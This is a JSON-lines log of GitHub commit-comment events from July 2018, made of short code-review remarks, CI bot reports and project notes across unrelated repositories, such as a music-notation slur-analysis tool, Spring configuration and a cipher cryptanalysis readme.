{"id":"7930645286","type":"CommitCommentEvent","actor":{"login":"imperdin"},"repo":{"name":"imperdin/xmr-stak"},"payload":{"comment":{"id":29625612,"position":null,"line":null,"path":null,"commit_id":"5b43d37d21a6c79e4945b72af1c0fea6a188cad2","created_at":"2018-07-06T19:46:43Z","updated_at":"2018-07-06T19:46:43Z","author_association":"OWNER","body":"A proper & simple shift would be to XOR `(d ^ q ^ 0x2d7b3ced)` (or any other 32 bit hex),\r\nAs otherwise the chances of collisions with other calculations is within reach\r\nE.g. = ((~d) ^ (~q)) = ( d ^ q) so the end result would be 2 wasted calculations without any gains\r\n"}},"created_at":"2018-07-06T19:46:43Z"}
{"id":"7930647750","type":"CommitCommentEvent","actor":{"login":"vivienlouradour"},"repo":{"name":"vivienlouradour/weather-station"},"payload":{"comment":{"id":29625615,"position":null,"line":null,"path":null,"commit_id":"73e67cf12b07285d95f42d388e0b2a4dc6903c80","created_at":"2018-07-06T19:47:26Z","updated_at":"2018-07-06T19:47:26Z","author_association":"OWNER","body":"Fix issue #1 "}},"created_at":"2018-07-06T19:47:26Z"}
{"id":"7930650742","type":"CommitCommentEvent","actor":{"login":"sadeghi336git"},"repo":{"name":"sadeghi336git/-RK_ID-in-SKINNY"},"payload":{"comment":{"id":29625625,"position":null,"line":null,"path":null,"commit_id":"5904eb9a457c98be9e59152312fe2a193ee4398e","created_at":"2018-07-06T19:48:19Z","updated_at":"2018-07-06T19:48:19Z","author_association":"OWNER","body":"==================================================================\r\n    CONSOLE APPLICATION : RK_ID of SKINNY Project Overview\r\n========================================================================\r\n\r\nThis code finds all differential characteristics of 13 rounds\r\nSKINNY-64 in TK-1 model as \\Delta(S1), \\Delta(tk11), \\Delta(output) underthe\r\nassumption of having a single active bit.\r\n\r\n//////////////////////////////////////////////////////////////////////////////\r\n\r\nMILP_IM_RK_(S1_Tk1_Output).cpp\r\n    This is the main application source file.\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\nOther files:\r\nHelp.pdf \r\na help file and comments to indicate parts of the source code you\r\nshould need\r\n\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\nOther notes:\r\n\r\nAppWizard uses \"TODO:\" comments to indicate parts of the source code you\r\nshould add to or customize.\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n"}},"created_at":"2018-07-06T19:48:19Z"}
{"id":"7930656684","type":"CommitCommentEvent","actor":{"login":"jakebolewski"},"repo":{"name":"TileDB-Inc/TileDB"},"payload":{"comment":{"id":29625630,"position":379,"line":631,"path":"doc/source/quickstart.rst","commit_id":"42c8e7781c82bb74ae6a6664ea63ad0eee360eb8","created_at":"2018-07-06T19:50:07Z","updated_at":"2018-07-06T19:50:07Z","author_association":"MEMBER","body":"I think we should encourage using `.update()` here as it is more efficient\r\n\r\n```\r\nA.update({\"key1\": \"1\", \"key2\": \"2\", \"key3\" : \"3\"})```"}},"created_at":"2018-07-06T19:50:07Z"}
{"id":"7930661814","type":"CommitCommentEvent","actor":{"login":"SvenRoederer"},"repo":{"name":"freifunk-berlin/firmware-packages"},"payload":{"comment":{"id":29625640,"position":null,"line":null,"path":null,"commit_id":"6da42fd59166d9d63917fd92d4e2f36f5e70400b","created_at":"2018-07-06T19:51:38Z","updated_at":"2018-07-06T19:51:38Z","author_association":"CONTRIBUTOR","body":"I suggest to split the 2 changes (static MAC-address and IP-table) into 2 separate commits. This makes following the changes more easy, as they do not relate to each other (are different issues)"}},"created_at":"2018-07-06T19:51:38Z"}
{"id":"7930663661","type":"CommitCommentEvent","actor":{"login":"MikhailArkhipov"},"repo":{"name":"Microsoft/vscode-languageserver-node"},"payload":{"comment":{"id":29625646,"position":null,"line":null,"path":null,"commit_id":"7994319e90866970f68fdd828b4dc03da5fdc423","created_at":"2018-07-06T19:52:11Z","updated_at":"2018-07-06T19:52:11Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-06T19:52:11Z"}
{"id":"7930666570","type":"CommitCommentEvent","actor":{"login":"adilger"},"repo":{"name":"hpc/mpifileutils"},"payload":{"comment":{"id":29625657,"position":null,"line":null,"path":null,"commit_id":"cfb5b36003a73d05549e1fccedfdf2d21c61e7e7","created_at":"2018-07-06T19:53:06Z","updated_at":"2018-07-06T19:53:06Z","author_association":"NONE","body":"Looks good. "}},"created_at":"2018-07-06T19:53:06Z"}
{"id":"7930669328","type":"CommitCommentEvent","actor":{"login":"junghans"},"repo":{"name":"votca/tools"},"payload":{"comment":{"id":29625662,"position":32,"line":92,"path":"src/libtools/random2.cc","commit_id":"3818c30645a5c9944034ea252314d361bef33125","created_at":"2018-07-06T19:53:53Z","updated_at":"2018-07-06T19:53:53Z","author_association":"MEMBER","body":"`save()` and `restore()` might be useful if you want to restart a simulations."}},"created_at":"2018-07-06T19:53:53Z"}
{"id":"7930670413","type":"CommitCommentEvent","actor":{"login":"ronlieb"},"repo":{"name":"halide/Halide"},"payload":{"comment":{"id":29625663,"position":null,"line":null,"path":null,"commit_id":"d4b3772cdad894611a29b176542dfb7afe01c5aa","created_at":"2018-07-06T19:54:12Z","updated_at":"2018-07-06T19:54:12Z","author_association":"CONTRIBUTOR","body":"LGTM"}},"created_at":"2018-07-06T19:54:12Z"}
{"id":"7930676299","type":"CommitCommentEvent","actor":{"login":"JanMarvin"},"repo":{"name":"JanMarvin/readspss"},"payload":{"comment":{"id":29625671,"position":null,"line":null,"path":null,"commit_id":"04ab56cef45efc100170c32555035f1408133aa3","created_at":"2018-07-06T19:55:50Z","updated_at":"2018-07-06T19:55:50Z","author_association":"OWNER","body":"Another test file provided by Uli Poetter"}},"created_at":"2018-07-06T19:55:50Z"}
{"id":"7930679445","type":"CommitCommentEvent","actor":{"login":"Deedasmi"},"repo":{"name":"rust-lang/blog.rust-lang.org"},"payload":{"comment":{"id":29625676,"position":null,"line":null,"path":null,"commit_id":"052c5e293f19c54a32a3b97fa808ab7f1bf1192e","created_at":"2018-07-06T19:56:37Z","updated_at":"2018-07-06T19:56:37Z","author_association":"NONE","body":"I was kind of confused :D"}},"created_at":"2018-07-06T19:56:37Z"}
{"id":"7930684419","type":"CommitCommentEvent","actor":{"login":"charbelsako"},"repo":{"name":"charbelsako/pacman"},"payload":{"comment":{"id":29625685,"position":null,"line":null,"path":null,"commit_id":"4ff2bade80e6e510c08067555a098a0ab2f298b2","created_at":"2018-07-06T19:58:01Z","updated_at":"2018-07-06T19:58:01Z","author_association":"OWNER","body":"Fixes Issue #22 "}},"created_at":"2018-07-06T19:58:01Z"}
{"id":"7930685774","type":"CommitCommentEvent","actor":{"login":"charbelsako"},"repo":{"name":"charbelsako/pacman"},"payload":{"comment":{"id":29625688,"position":null,"line":null,"path":null,"commit_id":"714c5f7f1ecc8eef72dba2bf4cd46fd17022ec52","created_at":"2018-07-06T19:58:24Z","updated_at":"2018-07-06T19:58:24Z","author_association":"OWNER","body":"Fixes Issue #14 "}},"created_at":"2018-07-06T19:58:24Z"}
{"id":"7930689840","type":"CommitCommentEvent","actor":{"login":"Dikaeinstein"},"repo":{"name":"andela/ET-cfh"},"payload":{"comment":{"id":29625696,"position":20,"line":31,"path":"public/js/services/game.js","commit_id":"ad91366499b833f5e9d2fb4c372cc399cd0ffe50","created_at":"2018-07-06T19:59:27Z","updated_at":"2018-07-06T19:59:27Z","author_association":"COLLABORATOR","body":"You did not read the dev note of the user story you are raising this PR for. Refactor your code."}},"created_at":"2018-07-06T19:59:27Z"}
{"id":"7926417742","type":"CommitCommentEvent","actor":{"login":"sirDonovan"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":29615787,"position":null,"line":null,"path":null,"commit_id":"4e3af0d24354cb831330f98f4a0e8fdb0f22af78","created_at":"2018-07-06T02:00:01Z","updated_at":"2018-07-06T02:00:01Z","author_association":"COLLABORATOR","body":"I thought it was still failing on Travis CI because 2.9.2 was cached, but it looks like that wasn't the issue. Any ideas?"}},"created_at":"2018-07-06T02:00:01Z"}
{"id":"7926418767","type":"CommitCommentEvent","actor":{"login":"Tribal1012"},"repo":{"name":"Tribal1012/mipsHex"},"payload":{"comment":{"id":29615795,"position":7,"line":19,"path":"mipsHex/asm_type/mips_asm_set.py","commit_id":"0da76ec7238c56c2509e9bba0e42f297b757ae50","created_at":"2018-07-06T02:00:20Z","updated_at":"2018-07-06T02:00:20Z","author_association":"OWNER","body":"remove this.\r\ncase) sltu $s3, $zero, $v0"}},"created_at":"2018-07-06T02:00:20Z"}
{"id":"7926418783","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29615796,"position":null,"line":null,"path":null,"commit_id":"ec83054acaf0abce6fc177567d3d85947f3833e2","created_at":"2018-07-06T02:00:20Z","updated_at":"2018-07-06T02:00:20Z","author_association":"NONE","body":"#6750-Crash-when-no-control-zone-name-is-specified-for-Load-control-in-AirloopHVACUnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1682 of 1682 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec83054acaf0abce6fc177567d3d85947f3833e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec83054acaf0abce6fc177567d3d85947f3833e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec83054acaf0abce6fc177567d3d85947f3833e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.17%25-green.png)</a>\n"}},"created_at":"2018-07-06T02:00:20Z"}
{"id":"7926421402","type":"CommitCommentEvent","actor":{"login":"yamilgv"},"repo":{"name":"yamilgv/GarminIQInstaHiit"},"payload":{"comment":{"id":29615799,"position":null,"line":null,"path":null,"commit_id":"4fee58228ee2ab4c63b29ad3229ee8966f1bb84d","created_at":"2018-07-06T02:01:14Z","updated_at":"2018-07-06T02:01:14Z","author_association":"OWNER","body":"Activated Start/Stop Toggle on Secondary Timer"}},"created_at":"2018-07-06T02:01:14Z"}
{"id":"7926424045","type":"CommitCommentEvent","actor":{"login":"krishnarohitreddy"},"repo":{"name":"gaddamamulya/store"},"payload":{"comment":{"id":29615803,"position":2,"line":2,"path":"app/controllers/trip_advisor_controller.rb","commit_id":"c5d80cc32bda5b4928a35fec1d774f10574025ca","created_at":"2018-07-06T02:02:12Z","updated_at":"2018-07-06T02:02:12Z","author_association":"NONE","body":"this is not controller it should inherit from application controller\r\n"}},"created_at":"2018-07-06T02:02:12Z"}
{"id":"7926424607","type":"CommitCommentEvent","actor":{"login":"JerryTsang"},"repo":{"name":"JerryTsang/android_kernel_sharp_msm8974"},"payload":{"comment":{"id":29615805,"position":null,"line":null,"path":null,"commit_id":"c2ba89c6b256cc21ae077888e3248121a5789cb3","created_at":"2018-07-06T02:02:26Z","updated_at":"2018-07-06T02:02:26Z","author_association":"OWNER","body":"不是，合并caf的，sdcard需要加上sharp的驱动changes才能正常工作"}},"created_at":"2018-07-06T02:02:26Z"}
{"id":"7926427237","type":"CommitCommentEvent","actor":{"login":"coddec"},"repo":{"name":"passionate-coder/Classic-Start"},"payload":{"comment":{"id":29615811,"position":null,"line":null,"path":null,"commit_id":"b34d0910283250ed0d20f4a6e2e8a6ac5f90ea55","created_at":"2018-07-06T02:03:27Z","updated_at":"2018-07-06T02:03:27Z","author_association":"MEMBER","body":"👍 👍 👍 @ge0rdi Amazing!\r\n🥇 🥇 🥇 😄 "}},"created_at":"2018-07-06T02:03:27Z"}
{"id":"7926427626","type":"CommitCommentEvent","actor":{"login":"Tribal1012"},"repo":{"name":"Tribal1012/mipsHex"},"payload":{"comment":{"id":29615812,"position":27,"line":28,"path":"mipsHex/asm_type/mips_asm_arithmetic.py","commit_id":"0da76ec7238c56c2509e9bba0e42f297b757ae50","created_at":"2018-07-06T02:03:36Z","updated_at":"2018-07-06T02:03:36Z","author_association":"OWNER","body":"if idc.LocByName(reg_val) failed, it return 0xffffffff."}},"created_at":"2018-07-06T02:03:36Z"}
{"id":"7926430336","type":"CommitCommentEvent","actor":{"login":"connordeckers"},"repo":{"name":"UTAS-HealthSciences/mylo-mate"},"payload":{"comment":{"id":29615815,"position":null,"line":null,"path":null,"commit_id":"41f625ee9f08afe59ade7c420bec73288df6e33c","created_at":"2018-07-06T02:04:42Z","updated_at":"2018-07-06T02:04:42Z","author_association":"CONTRIBUTOR","body":"Forgot to tag issue. \r\nSee issue #122 "}},"created_at":"2018-07-06T02:04:42Z"}
{"id":"7926437484","type":"CommitCommentEvent","actor":{"login":"brainstorm"},"repo":{"name":"umccr/umccrise-ami"},"payload":{"comment":{"id":29615823,"position":null,"line":null,"path":null,"commit_id":"ba3d44eb184bcb3cb5758421cbf8de1f247e8df0","created_at":"2018-07-06T02:07:31Z","updated_at":"2018-07-06T02:07:31Z","author_association":"MEMBER","body":"Wow, thanks a ton for those pointers Angel! I will definitely read through the docs instead of just following the [aws-batch-genomics](https://github.com/aws-samples/aws-batch-genomics/) writeup... also keeping an eye on the [cromwell aws batch 101](https://github.com/broadinstitute/cromwell/blob/e9f47c923ab7ec0cf6b4c6b2ae45e66d0d88e907/docs/tutorials/AwsBatch101.md) although it seems to [need some work on the docs](https://github.com/broadinstitute/cromwell/issues/3815) it'll help @reisingerf and I in deploying our UMCCR+CWL cancer genomics infra.\r\n\r\nThanks again!"}},"created_at":"2018-07-06T02:07:31Z"}
{"id":"7926439401","type":"CommitCommentEvent","actor":{"login":"shinhanbit"},"repo":{"name":"shinhanbit/shinhanbit.github.io"},"payload":{"comment":{"id":29615824,"position":8,"line":12,"path":"_config.yml","commit_id":"7d7ac3d0fd3c4e7d32ce704518616d98919669b0","created_at":"2018-07-06T02:08:16Z","updated_at":"2018-07-06T02:08:16Z","author_association":"OWNER","body":"shinhanbit"}},"created_at":"2018-07-06T02:08:16Z"}
{"id":"7926457963","type":"CommitCommentEvent","actor":{"login":"mouserj"},"repo":{"name":"klundeen/5300-Quail"},"payload":{"comment":{"id":29615879,"position":null,"line":null,"path":null,"commit_id":"11dedc8599cb0cb12f02bdd12ce766d60d152bb0","created_at":"2018-07-06T02:15:27Z","updated_at":"2018-07-06T02:15:27Z","author_association":"COLLABORATOR","body":"Final draft for Milestone 1"}},"created_at":"2018-07-06T02:15:27Z"}
{"id":"7926464149","type":"CommitCommentEvent","actor":{"login":"aXises"},"repo":{"name":"SummerProgram2018/RevYou"},"payload":{"comment":{"id":29615887,"position":null,"line":null,"path":null,"commit_id":"8c7b13ac5dcdca56f403f08fa3c7e50dd0a59af0","created_at":"2018-07-06T02:17:33Z","updated_at":"2018-07-06T02:17:33Z","author_association":"MEMBER","body":"nice"}},"created_at":"2018-07-06T02:17:33Z"}
{"id":"7926464302","type":"CommitCommentEvent","actor":{"login":"hellodt"},"repo":{"name":"Junv1003/NBAPrediction"},"payload":{"comment":{"id":29615888,"position":null,"line":null,"path":null,"commit_id":"ba91171d42b3bb380ac7f561260b3a1823008021","created_at":"2018-07-06T02:17:37Z","updated_at":"2018-07-06T02:17:37Z","author_association":"COLLABORATOR","body":"宾萌"}},"created_at":"2018-07-06T02:17:37Z"}
{"id":"7926465038","type":"CommitCommentEvent","actor":{"login":"jacobseiler"},"repo":{"name":"jacobseiler/rsage"},"payload":{"comment":{"id":29615890,"position":44,"line":182,"path":"sage/model_cooling_heating.c","commit_id":"7513c0d124d21978747ee6bbb8c1cd2ee0068b85","created_at":"2018-07-06T02:17:55Z","updated_at":"2018-07-06T02:17:55Z","author_association":"OWNER","body":"@annehutter , should dust be added/removed from the cold/gas reservoir when gas cools? Not sure if only the gas cools or if the dust follows as well... "}},"created_at":"2018-07-06T02:17:55Z"}
{"id":"7926466172","type":"CommitCommentEvent","actor":{"login":"nobodxbodon"},"repo":{"name":"HL4A/hl4a-core"},"payload":{"comment":{"id":29615891,"position":null,"line":null,"path":null,"commit_id":"34d2a990af25e0e28535be1dd4c48e7b5653a0d1","created_at":"2018-07-06T02:18:22Z","updated_at":"2018-07-06T02:18:22Z","author_association":"NONE","body":"你是说Android全家桶的API还在增加中吧?\r\n我是说这个core的API, 感觉会稳定地早一些?"}},"created_at":"2018-07-06T02:18:22Z"}
{"id":"7926467014","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29615892,"position":null,"line":null,"path":null,"commit_id":"011ee13592e0e19b9f9a8d34b4eaf574b7863dce","created_at":"2018-07-06T02:18:41Z","updated_at":"2018-07-06T02:18:41Z","author_association":"CONTRIBUTOR","body":"This commit adds a slur analysis tool for proofreading Humdrum files for unbalanced slur markers.  Slurs are stared with a `(` character and ended with a `)` character.  This is an implenentation for issue https://github.com/humdrum-tools/verovio-humdrum-viewer/issues/119.\r\n\r\nHere is an example use of the tool in [VHV](http://verovio.humdrum.org):\r\n\r\n![slur](https://user-images.githubusercontent.com/3487289/42356439-c2fb09b4-80d2-11e8-99a4-c339a79a63d9.gif)\r\n\r\n\r\nExample input to slur analysis:\r\n\r\n```\r\n**kern\r\n*M4/4\r\n=1\r\n4c)\r\n4d)\r\n(4e\r\n4f)\r\n=2\r\n(4g\r\n(4a\r\n==\r\n*-\r\n!!!filter: slur\r\n```\r\n\r\nExample output from filtering process:\r\n\r\n```\r\n**kern\r\n*M4/4\r\n=1\r\n4c)j\r\n4d)j\r\n(4e\r\n4f)\r\n=2\r\n(4gi\r\n(4ai\r\n==\r\n*-\r\n!!!Xfilter: slur\r\n!!!RDF**kern: i = marked note, color=\"hotpink\", text=\"extra(\"\r\n!!!RDF**kern: j = marked note, color=\"magenta\", text=\"extra)\"\r\n```\r\nUnbalanced slur endpoints are marked so that they will be highlighted in pink when converting to MEI.  In addition, a text direction will be placed above the associated note/chord to make it more visible.  Only one error will be marked for a note (the filter will show the next problem on the same note after  another one is fixed).\r\n\r\nThe slur analysis does not deal with cross-staff slurs yet.\r\n\r\nFinal conversion to MEI:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-06T04:09:05\" version=\"2.0.0-dev-b3eaed9-dirty\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title xml:id=\"title-L13\" analog=\"humdrum:Xfi\" type=\"translated\">slur</title>\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n        <extMeta>\r\n            <frames xmlns:humxml=\"http://www.humdrum.org/ns/humxml\">\r\n                <metaFrame n=\"12\" token=\"!!!Xfilter: slur\" xml:id=\"loc12\">\r\n                    <frameInfo>\r\n                        <startTime float=\"6\" />\r\n                        <frameType>reference</frameType>\r\n                        <referenceKey>Xfilter</referenceKey>\r\n                        <referenceValue>slur</referenceValue>\r\n                    </frameInfo>\r\n                </metaFrame>\r\n                <metaFrame n=\"13\" token=\"!!!RDF**kern: i = marked note, color=&quot;hotpink&quot;, text=&quot;extra(&quot;\" xml:id=\"loc13\">\r\n                    <frameInfo>\r\n                        <startTime float=\"6\" />\r\n                        <frameType>reference</frameType>\r\n                        <referenceKey>RDF**kern</referenceKey>\r\n                        <referenceValue>i = marked note, color=\"hotpink\", text=\"extra(\"</referenceValue>\r\n                    </frameInfo>\r\n                </metaFrame>\r\n                <metaFrame n=\"14\" token=\"!!!RDF**kern: j = marked note, color=&quot;magenta&quot;, text=&quot;extra)&quot;\" xml:id=\"loc14\">\r\n                    <frameInfo>\r\n                        <startTime float=\"6\" />\r\n                        <frameType>reference</frameType>\r\n                        <referenceKey>RDF**kern</referenceKey>\r\n                        <referenceValue>j = marked note, color=\"magenta\", text=\"extra)\"</referenceValue>\r\n                    </frameInfo>\r\n                </metaFrame>\r\n            </frames>\r\n        </extMeta>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000001545241848\">\r\n                <score xml:id=\"score-0000001359996165\">\r\n                    <scoreDef xml:id=\"scoredef-0000001456706064\">\r\n                        <staffGrp xml:id=\"staffgrp-0000001795459913\">\r\n                            <staffDef xml:id=\"staffdef-0000000917595196\" clef.shape=\"G\" clef.line=\"2\" meter.count=\"4\" meter.unit=\"4\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000001364936201\" />\r\n                            </staffDef>\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L3\" n=\"1\">\r\n                            <staff xml:id=\"staff-L3F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L3F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L4F1\" type=\"marked\" dur=\"4\" oct=\"4\" pname=\"c\" color=\"magenta\" accid.ges=\"n\" />\r\n                                    <note xml:id=\"note-L5F1\" type=\"marked\" dur=\"4\" oct=\"4\" pname=\"d\" color=\"magenta\" accid.ges=\"n\" />\r\n                                    <note xml:id=\"note-L6F1\" dur=\"4\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                    <note xml:id=\"note-L7F1\" dur=\"4\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <dir xml:id=\"dir-L4F1\" place=\"above\" staff=\"1\" tstamp=\"1.000000\">\r\n                                <rend xml:id=\"rend-0000001202295160\" color=\"magenta\" fontstyle=\"normal\" fontweight=\"bold\">extra)</rend>\r\n                            </dir>\r\n                            <dir xml:id=\"dir-L5F1\" place=\"above\" staff=\"1\" tstamp=\"2.000000\">\r\n                                <rend xml:id=\"rend-0000002034143710\" color=\"magenta\" fontstyle=\"normal\" fontweight=\"bold\">extra)</rend>\r\n                            </dir>\r\n                            <slur xml:id=\"slur-L6F1-L7F1N1\" staff=\"1\" startid=\"#note-L6F1\" endid=\"#note-L7F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L8\" right=\"end\" n=\"2\">\r\n                            <staff xml:id=\"staff-L8F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L8F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L9F1\" type=\"marked\" dur=\"4\" oct=\"4\" pname=\"g\" color=\"hotpink\" accid.ges=\"n\" />\r\n                                    <note xml:id=\"note-L10F1\" type=\"marked\" dur=\"4\" oct=\"4\" pname=\"a\" color=\"hotpink\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <dir xml:id=\"dir-L9F1\" place=\"above\" staff=\"1\" tstamp=\"1.000000\">\r\n                                <rend xml:id=\"rend-0000002054215334\" color=\"hotpink\" fontstyle=\"normal\" fontweight=\"bold\">extra(</rend>\r\n                            </dir>\r\n                            <dir xml:id=\"dir-L10F1\" place=\"above\" staff=\"1\" tstamp=\"2.000000\">\r\n                                <rend xml:id=\"rend-0000001170156304\" color=\"hotpink\" fontstyle=\"normal\" fontweight=\"bold\">extra(</rend>\r\n                            </dir>\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```"}},"created_at":"2018-07-06T02:18:41Z"}
{"id":"7926467996","type":"CommitCommentEvent","actor":{"login":"Andrea9678"},"repo":{"name":"SummerProgram2018/RevYou"},"payload":{"comment":{"id":29615893,"position":null,"line":null,"path":null,"commit_id":"8c7b13ac5dcdca56f403f08fa3c7e50dd0a59af0","created_at":"2018-07-06T02:19:03Z","updated_at":"2018-07-06T02:19:03Z","author_association":"CONTRIBUTOR","body":"nice"}},"created_at":"2018-07-06T02:19:03Z"}
{"id":"7926497200","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29615934,"position":null,"line":null,"path":null,"commit_id":"9e23f234076f2b5e3ebf035f098b31c33fe18134","created_at":"2018-07-06T02:30:24Z","updated_at":"2018-07-06T02:30:24Z","author_association":"COLLABORATOR","body":"this should be the final changes after you update_data gets finished!"}},"created_at":"2018-07-06T02:30:24Z"}
{"id":"7926501976","type":"CommitCommentEvent","actor":{"login":"pranav-patil"},"repo":{"name":"pranav-patil/spring-microservices"},"payload":{"comment":{"id":29615938,"position":11,"line":11,"path":"analytics-service/src/main/resources/bootstrap.yml","commit_id":"e09f1ff26b7f4f402270b34b146ec1f0f6cc36f9","created_at":"2018-07-06T02:32:15Z","updated_at":"2018-07-06T02:32:15Z","author_association":"OWNER","body":"Instead of using the spring.cloud.config.uri we could also have use discovery server to get the config-service instance by serviceId as below. But this would require that discovery-service properties cannot be stored on config server, and the config service has to have additional configuration in its application.yml to register with eureka service so that other service can get its instance url from serviceId.\r\n\r\n```\r\nspring:\r\n  cloud:\r\n    config:\r\n      discovery:\r\n        enabled: true\r\n        serviceId: config-service\r\n```"}},"created_at":"2018-07-06T02:32:15Z"}
{"id":"7926502055","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29615940,"position":null,"line":null,"path":null,"commit_id":"b48f169a40bd467619304a3ef564a421435aa852","created_at":"2018-07-06T02:32:17Z","updated_at":"2018-07-06T02:32:17Z","author_association":"NONE","body":"#6598-FanSystemModel-crashes-using-Continuous-speed-control-method (rraustad) - x86_64-MacOS-10.9-clang: OK (2933 of 2933 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b48f169a40bd467619304a3ef564a421435aa852-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b48f169a40bd467619304a3ef564a421435aa852-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T02:32:17Z"}
{"id":"7926502498","type":"CommitCommentEvent","actor":{"login":"dansali1"},"repo":{"name":"CognizantGrads-TeamALT/grizzly-frontend"},"payload":{"comment":{"id":29615942,"position":null,"line":null,"path":null,"commit_id":"a1b48600f53272b7871bb1935b537f64f04d3e11","created_at":"2018-07-06T02:32:27Z","updated_at":"2018-07-06T02:32:27Z","author_association":"CONTRIBUTOR","body":"Removes the need to store anything else extra inside of the localstorage.\r\n\r\nUp to you @spcognizant, use it if you want 👍 "}},"created_at":"2018-07-06T02:32:27Z"}
{"id":"7926518895","type":"CommitCommentEvent","actor":{"login":"xdg988"},"repo":{"name":"xdg988/Kaggle-Avito-Demand-Prediction-Challenge"},"payload":{"comment":{"id":29615967,"position":null,"line":null,"path":null,"commit_id":"f7836d77cee79666c1bd73dec64a0a18fdf7d429","created_at":"2018-07-06T02:38:53Z","updated_at":"2018-07-06T02:38:53Z","author_association":"OWNER","body":"with VCG16 features"}},"created_at":"2018-07-06T02:38:53Z"}
{"id":"7926535352","type":"CommitCommentEvent","actor":{"login":"exodrifter"},"repo":{"name":"exodrifter/unity-python"},"payload":{"comment":{"id":29615986,"position":null,"line":null,"path":null,"commit_id":"f864edb51f2a4f8c5ae2cf77e2c28df540bd6f37","created_at":"2018-07-06T02:45:24Z","updated_at":"2018-07-06T02:45:24Z","author_association":"OWNER","body":"@off99555 Which file are you talking about?"}},"created_at":"2018-07-06T02:45:24Z"}
{"id":"7926535947","type":"CommitCommentEvent","actor":{"login":"billpine"},"repo":{"name":"melimore86/Data"},"payload":{"comment":{"id":29615989,"position":null,"line":null,"path":null,"commit_id":"bc962bc1d31ec9db2ba35b72b0c8d4a76122fc36","created_at":"2018-07-06T02:45:38Z","updated_at":"2018-07-06T02:45:38Z","author_association":"NONE","body":"Thanks for continuing to work on this."}},"created_at":"2018-07-06T02:45:38Z"}
{"id":"7926537368","type":"CommitCommentEvent","actor":{"login":"TingyiChen"},"repo":{"name":"JerryTsang/android_kernel_sharp_msm8974"},"payload":{"comment":{"id":29615990,"position":null,"line":null,"path":null,"commit_id":"c2ba89c6b256cc21ae077888e3248121a5789cb3","created_at":"2018-07-06T02:46:13Z","updated_at":"2018-07-06T02:46:13Z","author_association":"NONE","body":"哪一个？我304现在SD卡插进去用不了，GPIO检测到了一会就复位了"}},"created_at":"2018-07-06T02:46:13Z"}
